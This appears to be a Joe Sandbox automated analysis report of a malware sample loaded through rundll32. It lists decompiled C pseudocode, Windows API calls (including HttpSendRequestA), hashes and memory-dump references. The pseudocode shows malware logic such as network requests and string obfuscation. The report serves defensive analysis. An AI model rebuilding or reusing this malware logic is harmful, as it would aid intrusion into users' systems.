                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04A47F25,?), ref: 04A427CC
                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,04A47F25,?), ref: 04A427D2
                                • _aullrem.NTDLL(?,?,00000013,00000000), ref: 04A427EF
                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04A47F25,?), ref: 04A4280C
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
• Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
• Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
• Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
• Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                • String ID:
                                • API String ID: 507476733-0
                                • Opcode ID: 99b55e8ed6a00dd724347387aa79d26402510c3fcd9b40a6ca920c77f130d940
                                • Instruction ID: 86c16eb059fca4620082cb3211a1c3113ae4d433fd29161eebf1e995f1fedb4b
                                • Opcode Fuzzy Hash: 99b55e8ed6a00dd724347387aa79d26402510c3fcd9b40a6ca920c77f130d940
                                • Instruction Fuzzy Hash: CF11C276A40200ABF310ABB4DC19B5E36A8DBD43A5F004129F909CB280FAB9ED418660
                                Uniqueness

                                Uniqueness Score: -1.00%

Control-flow Graph (rendered graph of executed / not executed blocks not reproduced in the text extract)
                                C-Code - Quality: 100%
                                			E04A497F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                				void* __esi;
                                				long _t10;
                                				int _t14;
                                				void* _t18;
                                				void* _t22;
                                
                                				_t9 = __eax;
                                				_t22 = __eax;
                                				if(_a4 != 0 && E04A48CFA(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                					L9:
                                					return GetLastError();
                                				}
                                				_t10 = E04A4A85C(_t9, _t18, _t22, _a8); // executed
                                				if(_t10 == 0) {
                                					ResetEvent( *(_t22 + 0x1c));
                                					ResetEvent( *(_t22 + 0x20));
                                					_t14 = HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0); // executed
                                					if(_t14 != 0) {
                                						SetEvent( *(_t22 + 0x1c));
                                						goto L7;
                                					} else {
                                						_t10 = GetLastError();
                                						if(_t10 == 0x3e5) {
                                							L7:
                                							_t10 = 0;
                                						}
                                					}
                                				}
                                				if(_t10 == 0xffffffff) {
                                					goto L9;
                                				}
                                				return _t10;
			}

                                APIs
                                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04A4937B,?,?,00000000,00000000), ref: 04A49831
                                • ResetEvent.KERNEL32(?), ref: 04A49836
                                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04A49843
                                • GetLastError.KERNEL32 ref: 04A4984E
                                • GetLastError.KERNEL32(?,?,00000102,04A4937B,?,?,00000000,00000000), ref: 04A49869
                                  • Part of subcall function 04A48CFA: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,04A49816,?,?,?,?,00000102,04A4937B,?,?,00000000), ref: 04A48D06
                                  • Part of subcall function 04A48CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04A49816,?,?,?,?,00000102,04A4937B,?), ref: 04A48D64
                                  • Part of subcall function 04A48CFA: lstrcpy.KERNEL32(00000000,00000000), ref: 04A48D74
                                • SetEvent.KERNEL32(?), ref: 04A4985C
                                Similarity
                                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 3739416942-0
                                • Opcode ID: 4257d7b54fa11a2a131a1747a2222c577b419c62023e2a32183114a90d2779e2
                                • Instruction ID: 7f85803bc1f12ec8bcf4b2e42e612b3e62292f27086639717ca7d239432be673
                                • Opcode Fuzzy Hash: 4257d7b54fa11a2a131a1747a2222c577b419c62023e2a32183114a90d2779e2
                                • Instruction Fuzzy Hash: 46018B71101200AAEB306F3ADC44F1FB6ACEFD4338F110A28E551910E0D722EC259E60
                                Uniqueness

                                Uniqueness Score: -1.00%

Control-flow Graph (rendered graph of executed / not executed blocks not reproduced in the text extract)
                                C-Code - Quality: 50%
                                			E04A41128(void** __esi) {
                                				intOrPtr _v0;
                                				intOrPtr _t4;
                                				intOrPtr _t6;
                                				void* _t8;
                                				void* _t9;
                                				intOrPtr _t10;
                                				void* _t11;
                                				void** _t13;
                                
                                				_t13 = __esi;
                                				_t4 =  *0x4a4d32c; // 0x4e595b0
                                				__imp__(_t4 + 0x40);
                                				while(1) {
                                					_t6 =  *0x4a4d32c; // 0x4e595b0
                                					_t1 = _t6 + 0x58; // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t8 =  *_t13;
                                				if(_t8 != 0 && _t8 != 0x4a4d030) {
                                					HeapFree( *0x4a4d238, 0, _t8);
                                				}
                                				_t9 = E04A44A2A(_v0, _t13); // executed
                                				_t13[1] = _t9;
                                				_t10 =  *0x4a4d32c; // 0x4e595b0
                                				_t11 = _t10 + 0x40;
                                				__imp__(_t11);
                                				return _t11;
			}

                                APIs
                                • RtlEnterCriticalSection.NTDLL(04E59570), ref: 04A41131
                                • Sleep.KERNEL32(0000000A,?,04A430F3), ref: 04A4113B
                                • HeapFree.KERNEL32(00000000,00000000,?,04A430F3), ref: 04A41163
                                • RtlLeaveCriticalSection.NTDLL(04E59570), ref: 04A4117F
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: 722e2f74ef2c31bf3a87772954c185508aa39493c954e4f7debf6ce3318dd27c
                                • Instruction ID: 67377f72cfdd7a367e87164e7516d7cc60517aeed0e2426a57f022b489b42e4f
                                • Opcode Fuzzy Hash: 722e2f74ef2c31bf3a87772954c185508aa39493c954e4f7debf6ce3318dd27c
                                • Instruction Fuzzy Hash: 64F0D4786022409FF7209F69E948B1E7BA8EBE4780B458418F506D6261D72AFC82DB25
                                Uniqueness

                                Uniqueness Score: -1.00%

Control-flow Graph (rendered graph of executed / not executed blocks not reproduced in the text extract)
                                C-Code - Quality: 57%
                                			E04A42F70(signed int __edx) {
                                				signed int _v8;
                                				long _v12;
                                				CHAR* _v16;
                                				long _v20;
                                				void* __edi;
                                				void* __esi;
                                				void* _t21;
                                				CHAR* _t22;
                                				CHAR* _t25;
                                				intOrPtr _t26;
                                				void* _t27;
                                				void* _t31;
                                				void* _t32;
                                				CHAR* _t36;
                                				CHAR* _t42;
                                				CHAR* _t43;
                                				CHAR* _t44;
                                				void* _t49;
                                				void* _t51;
                                				CHAR* _t54;
                                				signed char _t56;
                                				intOrPtr _t58;
                                				signed int _t59;
                                				void* _t62;
                                				CHAR* _t65;
                                				CHAR* _t66;
                                				char* _t67;
                                				void* _t68;
                                
                                				_t61 = __edx;
                                				_v20 = 0;
                                				_v8 = 0;
                                				_v12 = 0;
                                				_t21 = E04A459A4();
                                				if(_t21 != 0) {
                                					_t59 =  *0x4a4d25c; // 0x4000000a
                                					_t55 = (_t59 & 0xf0000000) + _t21;
                                					 *0x4a4d25c = (_t59 & 0xf0000000) + _t21;
                                				}
                                				_t22 =  *0x4a4d160(0, 2); // executed
                                				_v16 = _t22;
                                				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                					_t25 = E04A42B6F( &_v8,  &_v20); // executed
                                					_t54 = _t25;
                                					_t26 =  *0x4a4d2a8; // 0x40a5a8
                                					if( *0x4a4d25c > 5) {
                                						_t8 = _t26 + 0x4a4e5cd; // 0x4d283a53
                                						_t27 = _t8;
                                					} else {
                                						_t7 = _t26 + 0x4a4e9f5; // 0x44283a44
                                						_t27 = _t7;
                                					}
                                					E04A49154(_t27, _t27);
                                					_t31 = E04A48E0D(_t61,  &_v20,  &_v12); // executed
                                					if(_t31 == 0) {
                                						CloseHandle(_v20);
                                					}
                                					_t62 = 5;
                                					if(_t54 != _t62) {
                                						 *0x4a4d270 =  *0x4a4d270 ^ 0x81bbe65d;
                                						_t32 = E04A41525(0x60);
                                						 *0x4a4d32c = _t32;
                                						__eflags = _t32;
                                						if(_t32 == 0) {
                                							_push(8);
                                							_pop(0);
                                						} else {
                                							memset(_t32, 0, 0x60);
                                							_t49 =  *0x4a4d32c; // 0x4e595b0
                                							_t68 = _t68 + 0xc;
                                							__imp__(_t49 + 0x40);
                                							_t51 =  *0x4a4d32c; // 0x4e595b0
                                							 *_t51 = 0x4a4e81a;
                                						}
                                						_t54 = 0;
                                						__eflags = 0;
                                						if(0 == 0) {
                                							_t36 = RtlAllocateHeap( *0x4a4d238, 0, 0x43);
                                							 *0x4a4d2c8 = _t36;
                                							__eflags = _t36;
                                							if(_t36 == 0) {
                                								_push(8);
                                								_pop(0);
                                							} else {
                                								_t56 =  *0x4a4d25c; // 0x4000000a
                                								_t61 = _t56 & 0x000000ff;
                                								_t58 =  *0x4a4d2a8; // 0x40a5a8
                                								_t13 = _t58 + 0x4a4e55a; // 0x697a6f4d
                                								_t55 = _t13;
                                								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4a4c287);
                                							}
                                							_t54 = 0;
                                							__eflags = 0;
                                							if(0 == 0) {
                                								asm("sbb eax, eax");
                                								E04A47A2E( ~_v8 &  *0x4a4d270,  &E04A4D00C); // executed
                                								_t42 = E04A47FBE(_t55); // executed
                                								_t54 = _t42;
                                								__eflags = _t54;
                                								if(_t54 != 0) {
                                									goto L30;
                                								}
                                								_t43 = E04A450E8(); // executed
                                								__eflags = _t43;
                                								if(_t43 != 0) {
                                									__eflags = _v8;
                                									_t65 = _v12;
                                									if(_v8 != 0) {
                                										L29:
                                										_t44 = E04A47C3D(_t61, _t65, _v8); // executed
                                										_t54 = _t44;
                                										goto L30;
                                									}
                                									__eflags = _t65;
                                									if(__eflags == 0) {
                                										goto L30;
                                									}
                                									_t54 = E04A446B2(__eflags,  &(_t65[4]));
                                									__eflags = _t54;
                                									if(_t54 == 0) {
                                										goto L30;
                                									}
                                									goto L29;
                                								}
                                								_t54 = 8;
                                							}
                                						}
                                					} else {
                                						_t66 = _v12;
                                						if(_t66 == 0) {
                                							L30:
                                							if(_v16 == 0 || _v16 == 1) {
                                								 *0x4a4d15c();
                                							}
                                							goto L34;
                                						}
                                						_t67 =  &(_t66[4]);
                                						do {
                                						} while (E04A48B7B(_t62, _t67, 0, 1) == 0x4c7);
                                					}
                                					goto L30;
                                				} else {
                                					_t54 = _t22;
                                					L34:
                                					return _t54;
                                				}
			}

                                APIs
                                  • Part of subcall function 04A459A4: GetModuleHandleA.KERNEL32(4C44544E,00000000,04A42F89,00000000,00000000), ref: 04A459B3
                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04A43006
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • memset.NTDLL ref: 04A43055
                                • RtlInitializeCriticalSection.NTDLL(04E59570), ref: 04A43066
                                  • Part of subcall function 04A446B2: memset.NTDLL ref: 04A446C7
                                  • Part of subcall function 04A446B2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04A44709
                                  • Part of subcall function 04A446B2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04A44714
                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04A43091
                                • wsprintfA.USER32 ref: 04A430C1
                                Similarity
                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                • String ID:
                                • API String ID: 4246211962-0
                                • Opcode ID: 3a4b500664144e171288e4e2fb8935faa382278224c969f9b46266fd9db369ec
                                • Instruction ID: 1c5bfc98491554389c22ed2535c46c4435cafbe70472f879e23760f0dce4f7ab
                                • Opcode Fuzzy Hash: 3a4b500664144e171288e4e2fb8935faa382278224c969f9b46266fd9db369ec
                                • Instruction Fuzzy Hash: 9D51C479B02214ABFF21AFB9D884B6E77B8EBC4714F104455E901EB140E779F945CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph: E04A42D74, basic blocks 0x4a42d74 to 0x4a42efe (rendered graph; node and edge listing omitted)
                                C-Code - Quality: 22%
                                			E04A42D74(signed int __eax, signed int _a4, signed int _a8) {
                                				signed int _v8;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				signed int _v20;
                                				intOrPtr _t81;
                                				char _t83;
                                				signed int _t90;
                                				signed int _t97;
                                				signed int _t99;
                                				char _t101;
                                				unsigned int _t102;
                                				intOrPtr _t103;
                                				char* _t107;
                                				signed int _t110;
                                				signed int _t113;
                                				signed int _t118;
                                				signed int _t122;
                                				intOrPtr _t124;
                                
                                				_t102 = _a8;
                                				_t118 = 0;
                                				_v20 = __eax;
                                				_t122 = (_t102 >> 2) + 1;
                                				_v8 = 0;
                                				_a8 = 0;
                                				_t81 = E04A41525(_t122 << 2);
                                				_v16 = _t81;
                                				if(_t81 == 0) {
                                					_push(8);
                                					_pop(0);
                                					L37:
                                					return 0;
                                				}
                                				_t107 = _a4;
                                				_a4 = _t102;
                                				_t113 = 0;
                                				while(1) {
                                					_t83 =  *_t107;
                                					if(_t83 == 0) {
                                						break;
                                					}
                                					if(_t83 == 0xd || _t83 == 0xa) {
                                						if(_t118 != 0) {
                                							if(_t118 > _v8) {
                                								_v8 = _t118;
                                							}
                                							_a8 = _a8 + 1;
                                							_t118 = 0;
                                						}
                                						 *_t107 = 0;
                                						goto L16;
                                					} else {
                                						if(_t118 != 0) {
                                							L10:
                                							_t118 = _t118 + 1;
                                							L16:
                                							_t107 = _t107 + 1;
                                							_t15 =  &_a4;
                                							 *_t15 = _a4 - 1;
                                							if( *_t15 != 0) {
                                								continue;
                                							}
                                							break;
                                						}
                                						if(_t113 == _t122) {
                                							L21:
                                							if(_a8 <= 0x20) {
                                								_push(0xb);
                                								L34:
                                								_pop(0);
                                								L35:
                                								E04A48B22(_v16);
                                								goto L37;
                                							}
                                							_t24 = _v8 + 5; // 0xcdd8d2f8
                                							_t103 = E04A41525((_v8 + _t24) * _a8 + 4);
                                							if(_t103 == 0) {
                                								_push(8);
                                								goto L34;
                                							}
                                							_t90 = _a8;
                                							_a4 = _a4 & 0x00000000;
                                							_v8 = _v8 & 0x00000000;
                                							_t124 = _t103 + _t90 * 4;
                                							if(_t90 <= 0) {
                                								L31:
                                								 *0x4a4d278 = _t103;
                                								goto L35;
                                							}
                                							do {
                                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                								_v12 = _v12 & 0x00000000;
                                								if(_a4 <= 0) {
                                									goto L30;
                                								} else {
                                									goto L26;
                                								}
                                								while(1) {
                                									L26:
                                									_t99 = _v12;
                                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                									if(_t99 == 0) {
                                										break;
                                									}
                                									_v12 = _v12 + 1;
                                									if(_v12 < _a4) {
                                										continue;
                                									}
                                									goto L30;
                                								}
                                								_v8 = _v8 - 1;
                                								L30:
                                								_t97 = _a4;
                                								_a4 = _a4 + 1;
                                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                								__imp__(_t124);
                                								_v8 = _v8 + 1;
                                								_t124 = _t124 + _t97 + 1;
                                							} while (_v8 < _a8);
                                							goto L31;
                                						}
                                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                						_t101 = _t83;
                                						if(_t83 - 0x61 <= 0x19) {
                                							_t101 = _t101 - 0x20;
                                						}
                                						 *_t107 = _t101;
                                						_t113 = _t113 + 1;
                                						goto L10;
                                					}
                                				}
                                				if(_t118 != 0) {
                                					if(_t118 > _v8) {
                                						_v8 = _t118;
                                					}
                                					_a8 = _a8 + 1;
                                				}
                                				goto L21;
                                			}

                                APIs
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 04A42E71
                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 04A42E86
                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04A42E9D
                                • lstrlen.KERNEL32(69B25F45), ref: 04A42EC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 562aa7d925e8c17d4dad870ddaaa2ae3ead97ddc30909caf0dcee2f37e5578fe
                                • Instruction ID: 4da40499127b6874dd6a1aec7bda53043afe7897c8f99bd95625dd85cef6c439
                                • Opcode Fuzzy Hash: 562aa7d925e8c17d4dad870ddaaa2ae3ead97ddc30909caf0dcee2f37e5578fe
                                • Instruction Fuzzy Hash: 1751AF32A00118EBDB21CF99C8857ADBBB5FFD5395F15809AF8159B241C771BB42DB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04A45319(void* __edx) {
                                				void* _v8;
                                				int _v12;
                                				WCHAR* _v16;
                                				void* __edi;
                                				void* __esi;
                                				void* _t23;
                                				intOrPtr _t24;
                                				void* _t26;
                                				intOrPtr _t32;
                                				intOrPtr _t35;
                                				void* _t37;
                                				intOrPtr _t38;
                                				void* _t40;
                                				intOrPtr _t42;
                                				void* _t45;
                                				void* _t50;
                                				void* _t52;
                                
                                				_t50 = __edx;
                                				_v12 = 0;
                                				_t23 = E04A4155A(0,  &_v8); // executed
                                				if(_t23 != 0) {
                                					_v8 = 0;
                                				}
                                				_t24 =  *0x4a4d2a8; // 0x40a5a8
                                				_t4 = _t24 + 0x4a4edc0; // 0x4e59368
                                				_t5 = _t24 + 0x4a4ed68; // 0x4f0053
                                				_t26 = E04A45D79( &_v16, _v8, _t5, _t4); // executed
                                				_t45 = _t26;
                                				if(_t45 == 0) {
                                					StrToIntExW(_v16, 0,  &_v12);
                                					_t45 = 8;
                                					if(_v12 < _t45) {
                                						_t45 = 1;
                                						__eflags = 1;
                                					} else {
                                						_t32 =  *0x4a4d2a8; // 0x40a5a8
                                						_t11 = _t32 + 0x4a4edb4; // 0x4e5935c
                                						_t48 = _t11;
                                						_t12 = _t32 + 0x4a4ed68; // 0x4f0053
                                						_t52 = E04A4272D(_t11, _t12, _t11);
                                						_t59 = _t52;
                                						if(_t52 != 0) {
                                							_t35 =  *0x4a4d2a8; // 0x40a5a8
                                							_t13 = _t35 + 0x4a4edfe; // 0x30314549
                                							_t37 = E04A45B05(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                							if(_t37 == 0) {
                                								_t61 =  *0x4a4d25c - 6;
                                								if( *0x4a4d25c <= 6) {
                                									_t42 =  *0x4a4d2a8; // 0x40a5a8
                                									_t15 = _t42 + 0x4a4ec0a; // 0x52384549
                                									E04A45B05(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                								}
                                							}
                                							_t38 =  *0x4a4d2a8; // 0x40a5a8
                                							_t17 = _t38 + 0x4a4edf8; // 0x4e593a0
                                							_t18 = _t38 + 0x4a4edd0; // 0x680043
                                							_t40 = E04A44538(_v8, 0x80000001, _t52, _t18, _t17); // executed
                                							_t45 = _t40;
                                							HeapFree( *0x4a4d238, 0, _t52);
                                						}
                                					}
                                					HeapFree( *0x4a4d238, 0, _v16);
                                				}
                                				_t54 = _v8;
                                				if(_v8 != 0) {
                                					E04A44FF0(_t54);
                                				}
                                				return _t45;
                                			}

                                APIs
                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04E59368,00000000,?,74E5F710,00000000,74E5F730), ref: 04A45368
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04E593A0,?,00000000,30314549,00000014,004F0053,04E5935C), ref: 04A45405
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04A47CCB), ref: 04A45417
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: 845d9cf8943cd323eb8e89f52bd610d13ecb01252f9bca05b97e64922cd51a5b
                                • Instruction ID: c764b3ea70108d6babe3dfba41d3999480bf39241442bc9e51f21c0b1cc77452
                                • Opcode Fuzzy Hash: 845d9cf8943cd323eb8e89f52bd610d13ecb01252f9bca05b97e64922cd51a5b
                                • Instruction Fuzzy Hash: 9D317C36900118FFEB11EF94DD84E9EBBBDEBD8704F114165E600AB160D7B1AE45DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E04A42C58(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                				void* _v8;
                                				void* __edi;
                                				void* _t13;
                                				intOrPtr _t18;
                                				void* _t24;
                                				void* _t30;
                                				void* _t36;
                                				void* _t40;
                                				intOrPtr _t42;
                                
                                				_t36 = __edx;
                                				_t32 = __ecx;
                                				_push(__ecx);
                                				_push(__ecx);
                                				_t42 =  *0x4a4d340; // 0x4e59b20
                                				_push(0x800);
                                				_push(0);
                                				_push( *0x4a4d238);
                                				if( *0x4a4d24c >= 5) {
                                					_t13 = RtlAllocateHeap(); // executed
                                					if(_t13 == 0) {
                                						L6:
                                						_t30 = 8;
                                						L7:
                                						if(_t30 != 0) {
                                							L10:
                                							 *0x4a4d24c =  *0x4a4d24c + 1;
                                							L11:
                                							return _t30;
                                						}
                                						_t44 = _a4;
                                						_t40 = _v8;
                                						 *_a16 = _a4;
                                						 *_a20 = E04A42C0D(_t44, _t40);
                                						_t18 = E04A431A8(_t40, _t44);
                                						if(_t18 != 0) {
                                							 *_a8 = _t40;
                                							 *_a12 = _t18;
                                							if( *0x4a4d24c < 5) {
                                								 *0x4a4d24c =  *0x4a4d24c & 0x00000000;
                                							}
                                							goto L11;
                                						}
                                						_t30 = 0xbf;
                                						E04A45433();
                                						HeapFree( *0x4a4d238, 0, _t40);
                                						goto L10;
                                					}
                                					_t24 = E04A49BF1(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                					L5:
                                					_t30 = _t24;
                                					goto L7;
                                				}
                                				if(RtlAllocateHeap() == 0) {
                                					goto L6;
                                				}
                                				_t24 = E04A45450(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
                                				goto L5;
                                			}

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 04A42C7C
                                  • Part of subcall function 04A45450: GetTickCount.KERNEL32 ref: 04A45464
                                  • Part of subcall function 04A45450: wsprintfA.USER32 ref: 04A454B4
                                  • Part of subcall function 04A45450: wsprintfA.USER32 ref: 04A454D1
                                  • Part of subcall function 04A45450: wsprintfA.USER32 ref: 04A454FD
                                  • Part of subcall function 04A45450: HeapFree.KERNEL32(00000000,?), ref: 04A4550F
                                  • Part of subcall function 04A45450: wsprintfA.USER32 ref: 04A45530
                                  • Part of subcall function 04A45450: HeapFree.KERNEL32(00000000,?), ref: 04A45540
                                  • Part of subcall function 04A45450: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04A4556E
                                  • Part of subcall function 04A45450: GetTickCount.KERNEL32 ref: 04A4557F
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 04A42C9A
                                • HeapFree.KERNEL32(00000000,00000002,04A47D16,?,04A47D16,00000002,?,?,04A4312C,?), ref: 04A42CF7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$wsprintf$AllocateFree$CountTick
                                • String ID: Ut
                                • API String ID: 1676223858-8415677
                                • Opcode ID: ee7ab267e7769a3816906a95b87a7b5be6b20fff26647f3a359b2f03cc87e109
                                • Instruction ID: e1274d283b231011f5170d483a1e5731a03e50b57eb3de84cf7d720715ba33b4
                                • Opcode Fuzzy Hash: ee7ab267e7769a3816906a95b87a7b5be6b20fff26647f3a359b2f03cc87e109
                                • Instruction Fuzzy Hash: 17217C7A201204ABEB119F59E880F9E3BACEBD8395F104066F902DB250DB75ED019BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 04A48A76
                                • SysAllocString.OLEAUT32(04A44BD8), ref: 04A48ABA
                                • SysFreeString.OLEAUT32(00000000), ref: 04A48ACE
                                • SysFreeString.OLEAUT32(00000000), ref: 04A48ADC
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 2943944cabac1a9af107c43f3587ad1750855ac349d7322591118541dde9db20
                                • Instruction ID: 8626c94304ba7197fb124b8310313f2e794cf88b0d9de03f81d32b776d14b84e
                                • Opcode Fuzzy Hash: 2943944cabac1a9af107c43f3587ad1750855ac349d7322591118541dde9db20
                                • Instruction Fuzzy Hash: 74311D79900209EFDB05DF98E8809AE7BB9FFD8310B61842EF506DB250E775A941CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04A45B05(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                				struct _FILETIME _v12;
                                				void* _t11;
                                				void* _t16;
                                				short _t19;
                                				void* _t22;
                                				void* _t24;
                                				void* _t25;
                                				short* _t26;
                                
                                				_t24 = __edx;
                                				_t25 = E04A47B3B(_t11, _a12);
                                				if(_t25 == 0) {
                                					_t22 = 8;
                                				} else {
                                					_t26 = _t25 + _a16 * 2;
                                					 *_t26 = 0; // executed
                                					_t16 = E04A42D2E(__ecx, _a4, _a8, _t25); // executed
                                					_t22 = _t16;
                                					if(_t22 == 0) {
                                						GetSystemTimeAsFileTime( &_v12);
                                						_t19 = 0x5f;
                                						 *_t26 = _t19;
                                						_t22 = E04A4A38F(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                					}
                                					HeapFree( *0x4a4d238, 0, _t25);
                                				}
                                				return _t22;
                                			}

                                APIs
                                  • Part of subcall function 04A47B3B: lstrlen.KERNEL32(?,00000000,04E59D18,00000000,04A45142,04E59F3B,?,?,?,?,?,69B25F44,00000005,04A4D00C), ref: 04A47B42
                                  • Part of subcall function 04A47B3B: mbstowcs.NTDLL ref: 04A47B6B
                                  • Part of subcall function 04A47B3B: memset.NTDLL ref: 04A47B7D
                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04E5935C), ref: 04A45B3D
                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04E5935C), ref: 04A45B6B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
